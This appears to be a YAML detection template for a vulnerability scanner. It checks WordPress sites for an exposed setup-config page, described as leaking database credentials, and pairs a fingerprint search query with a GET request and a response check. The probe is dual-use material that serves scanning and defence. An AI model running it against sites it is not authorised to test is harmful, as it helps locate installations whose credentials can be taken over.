product: WordPress
vName: WordPress 配置泄露
type: 信息泄露
vID: [ ]
level: 3
vDesc: Attacker can view the config file which contains the username and password
version: ''
note: ''
search: app="WordPress"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-admin/setup-config.php?step=1
    verify:
      logic: and
      check:
        - status: 200
          body:
            value:
              - Username
            logic: and
